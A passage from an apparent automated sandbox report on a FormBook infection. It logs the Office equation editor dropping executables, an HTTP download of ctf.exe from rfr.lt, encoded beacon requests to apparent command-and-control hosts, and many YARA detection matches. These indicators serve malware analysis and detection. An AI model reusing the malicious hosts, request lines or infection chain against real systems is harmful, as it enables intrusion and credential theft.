3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: word.exe, word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.507160581.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.673859564.0000000001CF0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.490190068.00000000077B8000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469131172.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.479966015.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.488819431.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.507699566.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerK
          Source: explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
          Source: explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exeJump to behavior
          Source: unknownDNS traffic detected: queries for: rfr.lt
          Source: global trafficHTTP traffic detected: GET /ctf.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rfr.ltConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1Host: www.ponto-bras.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
